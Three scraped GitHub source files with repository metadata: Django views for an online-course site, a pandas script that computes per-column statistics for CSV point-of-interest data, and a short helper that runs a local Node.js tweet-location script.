c8d875090e511a64be18c1beef7a7dbfdf199d4e | 10d7e5ae233518fc81c84d14dc83322d17ad04a9 | /apps/courses/views.py | 8e237e990223ef829132a05661c4b8178d959322 | [] | no_license | zonggeng/Mxonline3 | 815e88ea4df681e45e9588cf1f91160b75bb2c89 | 0dd3f11d7ba0060e2c696406235603608e90293a | refs/heads/master | 2021-05-08T16:09:03.694267 | 2018-02-07T04:25:49 | 2018-02-07T04:25:49 | 120,145,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | from django.db.models import Q
from django.shortcuts import render
from pure_pagination import Paginator, EmptyPage, PageNotAnInteger
# Create your views here.
from django.views.generic.base import View
from courses.models import Course
from operation.models import UserFavorite
class CourseListView(View):
    """Course list page: keyword search, sorting, pagination and a
    hot-course sidebar."""

    def get(self, request):
        all_course = Course.objects.all()
        # Top three most-subscribed courses for the "hot courses" sidebar.
        hot_courses = Course.objects.all().order_by("-students")[:3]

        # Keyword search over name/description/detail, case-insensitive
        # (icontains) and OR-combined via Q objects.
        search_keywords = request.GET.get('keywords', '')
        if search_keywords:
            all_course = all_course.filter(
                Q(name__icontains=search_keywords) |
                Q(desc__icontains=search_keywords) |
                Q(detail__icontains=search_keywords))

        # Optional ordering: by student count or by click count.
        sort = request.GET.get('sort', "")
        if sort == "students":
            all_course = all_course.order_by("-students")
        elif sort == "hot":
            all_course = all_course.order_by("-click_nums")

        # Paginate six courses per page.  Paginator.page() is what raises
        # PageNotAnInteger, so the fallback must wrap that call — the old
        # code wrapped request.GET.get, which never raises it, so a bad
        # ?page= value crashed the view instead of showing page 1.
        page = request.GET.get('page', 1)
        p = Paginator(all_course, 6, request=request)
        try:
            courses = p.page(page)
        except PageNotAnInteger:
            courses = p.page(1)

        return render(request, "course-list.html", {
            "all_course": courses,
            "sort": sort,
            "hot_courses": hot_courses,
            "search_keywords": search_keywords
        })
# Course detail view
class CourseDetailView(View):
    """Course detail page: click counting, favourite flags and a related
    course recommended by shared tag."""

    def get(self, request, course_id):
        # course_id arrives from the URLconf as a string.
        course = Course.objects.get(id=int(course_id))

        # Every view of the detail page counts as one click.
        course.click_nums += 1
        course.save()

        # Favourite flags are only meaningful for authenticated users.
        # fav_type=1 -> course favourite, fav_type=2 -> organisation favourite.
        has_fav_course = False
        has_fav_org = False
        if request.user.is_authenticated:
            if UserFavorite.objects.filter(user=request.user, fav_id=course.id, fav_type=1):
                has_fav_course = True
            if UserFavorite.objects.filter(user=request.user, fav_id=course.course_org_id, fav_type=2):
                has_fav_org = True

        # Recommend one other course sharing the same tag.  Excluding the
        # current course by id is reliable; the old [1:2] slice only
        # skipped it by accident of unspecified ordering.
        tag = course.tag
        if tag:
            relate_courses = Course.objects.filter(tag=tag).exclude(id=course.id)[:1]
        else:
            relate_courses = []

        return render(request, "course-detail.html", {
            "course": course,
            "relate_courses": relate_courses,
            "has_fav_course": has_fav_course,
            "has_fav_org": has_fav_org,
        })
| [
"137100856@163.com"
] | 137100856@163.com |
258533bb62c69333a94d9d963a951015171969f8 | 19eb9945c3b11eef9b5792f85218a7a62a8aa17e | /explore.py | dd21c31197a74ccc4b0013dea08a3d15f36cb424 | [
"Apache-2.0"
] | permissive | SLIPO-EU/poi-data-exploration | 659ff452132ad131657e5ed66f41e092ce082936 | 4d11a14423a5b68c56da4131e67ff36e11dabe16 | refs/heads/master | 2020-03-21T08:00:04.349687 | 2018-08-30T09:21:37 | 2018-08-30T09:21:37 | 138,313,171 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,902 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 20 11:27:34 2018
@author: Pantelis Mitropoulos
"""
import pandas as pd
import re
import json
from statistics import *
import sys
import time
class StatsWrapper(object):
    """
    Helpers for loading a CSV file and computing per-column statistics.

    `status` stays 1 while processing can continue and drops to 0 after a
    fatal problem (missing filename, unreadable file); human-readable
    messages accumulate in `errors`.
    """

    # Class-level defaults kept for backward compatibility with code that
    # reads them off the class; __init__ shadows them with per-instance
    # copies so instances no longer share one mutable list.
    errors = []
    status = 1

    def __init__(self):
        self.errors = []
        self.status = 1

    def get_valid_filename(self, s):
        """Return *s* sanitised into a safe filename: spaces become '_',
        everything except word characters, '-' and '.' is stripped."""
        s = str(s).strip().replace(' ', '_')
        return re.sub(r'(?u)[^-\w.]', '', s)

    def reduceOther(self, data):
        """Collapse all rows of *data* (columns: name, value) whose value
        falls below 4% of the total into a single 'other (k)' row.
        """
        total = data.value.sum()
        limit = int(round(0.04 * total, 0))
        x_list = data.query('value >= ' + str(limit))
        below_limit = data.query('value < ' + str(limit))
        below_count = below_limit['name'].count()
        if below_count > 0:
            # A single small category keeps its own name instead of 'other (1)'.
            label = 'other (' + str(below_count) + ')' if below_count > 1 else below_limit.iloc[0]['name']
            new = pd.DataFrame([[label, below_limit['value'].sum()]], columns=['name', 'value'])
            # DataFrame.append was removed in pandas 2.0; concat is the
            # supported replacement.
            x_list = pd.concat([x_list, new])
        return x_list

    def extractArgs(self, argv):
        """Parse 'key=value' command-line arguments.

        Recognised keys: filename (required), column, category, chart_type,
        delimiter.  Unknown keys and a missing filename are reported via
        `errors`; a missing filename also sets `status` to 0, in which case
        None is returned.  On success returns the resolved options dict
        with defaults filled in.
        """
        args = {}
        # argv[0] is the script path itself, so only real arguments are
        # parsed (the old code compared against a hard-coded 'eval.py'
        # script name, which broke when the script was renamed).
        for arg in argv[1:]:
            key = arg.split('=')[0]
            if key not in ['filename', 'column', 'category', 'chart_type', 'delimiter']:
                self.errors.append('Unknown option: ' + key)
            else:
                args[key] = arg
        try:
            filename = args['filename'].split('=')[1]
        except (KeyError, IndexError):
            self.errors.append('Filename should be supplied')
            self.status = 0
        if (self.status == 1):
            try:
                delimiter = args['delimiter'].split('=')[1]
            except (KeyError, IndexError):
                delimiter = ','
            try:
                column = args['column'].split('=')[1]
            except (KeyError, IndexError):
                column = False
            try:
                category = args['category'].split('=')[1]
            except (KeyError, IndexError):
                # Well-known columns get a matching specialised category.
                category = 'generic' if column not in ['name', 'address', 'cost', 'schedule', 'phone', 'rating'] else column
            try:
                chart_type = args['chart_type'].split('=')[1]
            except (KeyError, IndexError):
                # Discrete-valued columns default to bars; everything else a pie.
                chart_type = 'bar' if column in ['categorical', 'schedule', 'category', 'rating', 'cost'] else 'pie'
            self.args = {'filename': filename, 'column': column, 'category': category, 'chart_type': chart_type, 'delimiter': delimiter}
            return self.args

    def readCSV(self, args):
        """Load args['filename'] into self.df and cache its shape/headers.

        If args['column'] names a missing column it is reset to False (the
        caller's dict is mutated on purpose) and an error is recorded; a
        missing file sets status to 0.
        """
        try:
            self.df = pd.read_csv(args['filename'], encoding='utf-8', delimiter=args['delimiter'], low_memory=False, engine='c')
            self.shape = self.df.shape
            self.headers = list(self.df)
            if args['column'] != False and args['column'] not in self.headers:
                self.errors.append('Column ' + args['column'] + ' not found in ' + args['filename'])
                args['column'] = False
        except FileNotFoundError:
            self.errors.append('File not found!')
            self.status = 0

    def generalStats(self, dataframe, columns):
        """Return per-column distinct-value counts for *columns* of
        *dataframe*.

        Each entry is {'name': column} plus, when the column has at most
        30 distinct values, a 'children' list of {'name': value,
        'value': count}.  Multi-valued cells separated by '|' are split
        before counting.
        """
        children = []
        for column in columns:
            # Bug fix: the dataframe argument was previously ignored in
            # favour of self.df.
            col = dataframe[column].astype('str')
            col = col.str.split("|").apply(pd.Series).stack().reset_index(drop=True)
            col = col.str.strip()
            distinct = col.value_counts().to_frame()
            distinct.columns = ['value']
            distinct.index.name = 'name'
            distinct = distinct.reset_index().to_dict('records')
            child = {"name": column}
            # Columns with too many distinct values are listed without children.
            if len(distinct) <= 30:
                child["children"] = distinct
            children.append(child)
        return children

    def prepare(self, col):
        """Split '|'-separated string cells into individual stacked values;
        non-object (numeric) columns are returned untouched."""
        if (col.dtype == 'object'):
            col = col.str.split("|").apply(pd.Series).stack().reset_index(drop=True)
            col = col.str.strip()
        return col

    def describe(self, col):
        """Enhanced pandas describe: adds a null count and, for string
        columns, min/max value lengths.  Values are converted to plain
        Python numbers so json.dump can serialise them."""
        isnull = col.isnull().value_counts()
        # value_counts has no True bucket when there are no nulls.
        try:
            null = isnull[True]
        except KeyError:
            null = 0
        if (col.dtype == 'object'):
            length = col.apply(str).map(len)
            desc = col.describe()
            # 'top'/'freq' are only informative when some value repeats.
            if desc["freq"] < 3:
                del desc["freq"]
                del desc["top"]
            desc["null"] = null
            desc["minimum length"] = length.min()
            desc["maximum length"] = length.max()
        else:
            desc = col.describe()
            desc["null"] = null
        # Convert numpy scalars to native ints/floats.  Series.iteritems
        # was removed in pandas 2.0, and the old int()-first conversion
        # silently truncated fractional statistics such as the mean.
        for key, value in desc.items():
            try:
                f = float(value)
            except (TypeError, ValueError):
                continue  # non-numeric entries such as 'top'
            desc[key] = int(f) if f.is_integer() else f
        return desc

    def clear(self):
        """Drop the loaded dataframe to release memory."""
        del self.df
        return
"""
Main ...
"""
if __name__ == "__main__":
    # Command-line entry point:
    #   python explore.py filename=... [column=...] [category=...]
    #                     [chart_type=...] [delimiter=...]
    start_time = time.time()
    wrapper = StatsWrapper()
    args = wrapper.extractArgs(sys.argv)
    if (wrapper.status == 1):
        wrapper.readCSV(args)
    # NOTE(review): if no filename was supplied, extractArgs returns None
    # and status is 0, so the args['column'] lookup below would raise —
    # confirm the script is always invoked with filename=...
    column = args['column']
    category = args['category']
    chart_type = args['chart_type']
    # Load summary: full file metadata on success, just the errors otherwise.
    general = {
        'status': wrapper.status,
        'filename': args['filename'],
        'rows': wrapper.shape[0],
        'columns': wrapper.shape[1],
        'headers': wrapper.headers,
        'errors': wrapper.errors
    } if len(wrapper.errors)==0 else {
        'status': wrapper.status,
        'errors': wrapper.errors
    }
    if general['status'] == 1:
        if column == False:
            # No column requested: dump per-column distinct-value stats for
            # the whole file into output/data.json.
            unique = {"name": args['filename']}
            unique["children"] = wrapper.generalStats(wrapper.df, wrapper.headers)
            data = {"general": general, "list": wrapper.headers, "unique": unique}
            end_time = time.time()
            with open('./output/' + 'data.json', 'w') as fp:
                json.dump(data, fp, ensure_ascii=False, indent=2)
        else:
            # Single-column analysis: keep just that column and release the
            # rest of the dataframe before the heavier processing.
            specific_data = pd.DataFrame()
            col = wrapper.df[column]
            wrapper.clear();
            print('Memory cleared')
            col = wrapper.prepare(col)
            specific_data["description"] = wrapper.describe(col)
            specific_data = specific_data.to_dict()
            # Dispatch to a category-specific analyser.  These classes
            # (Categorical, Schedule, ...) come from the wildcard import of
            # `statistics` — presumably a local project module shadowing the
            # stdlib one; verify before renaming either.
            if category == 'categorical':
                stats = Categorical(col, chart_type)
                stats.reduceOther(stats.chart)
            elif category == 'schedule':
                stats = Schedule(col, chart_type)
            elif category == 'name':
                stats = Name(col, chart_type)
                stats.reduceOther(stats.chart)
            elif category == 'cost':
                stats = PriceRange(col, chart_type)
            elif category == 'address':
                stats = Address(col, chart_type)
                print(stats.chart)
            elif category == 'phone':
                stats = PhoneNumber(col, chart_type)
            elif category == 'rating':
                stats = Ratings(col, chart_type)
                stats.reduceOther(stats.chart)
            else:
                # Anything unrecognised falls back to generic regex stats.
                category = 'generic'
                stats = RegexStats(col, chart_type)
                stats.reduceOther(stats.chart)
            specific_data[category] = stats.chart
            end_time = time.time()
            # Results go to output/<column>.json (column name sanitised).
            json_filename = wrapper.get_valid_filename(column + ".json")
            with open('./output/' + json_filename, 'w') as fp:
                json.dump(specific_data, fp, ensure_ascii=False, indent=2)
        print("--- %s seconds ---" % (end_time - start_time))
    else:
        # Load failed: report the errors in data.json instead.
        with open('./output/' + 'data.json', 'w') as fp:
json.dump(general, fp, ensure_ascii=False, indent=2) | [
"noreply@github.com"
] | noreply@github.com |
26072b403ea326c1d2d2ddda786ce2b7b13952b8 | 431facece670577819a32d5e638db8dc3350683f | /CCW/test.py | 0d082665fc62f305e3b7619a03a8314949d41dca | [] | no_license | mateoglzc/CodechellaProject | 59e2e393236442cc5536ef4a0c046e490ff37700 | 43a1dea0bd123fd5666ff762d089b5af0d07dc98 | refs/heads/master | 2023-01-18T23:17:11.625963 | 2020-11-22T04:46:28 | 2020-11-22T04:46:28 | 314,722,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from Naked.toolshed.shell import execute_js, muterun_js
def RunNodeScript():
    """Run the tweet-location Node.js script and print whether it succeeded."""
    from Naked.toolshed.shell import execute_js, muterun_js
    succeeded = execute_js('CCW/static/JS/getTweetLocations.js')
    print('Succesfull' if succeeded else 'Unsuccesfull')
| [
"mateoglzc@hotmail.com"
] | mateoglzc@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.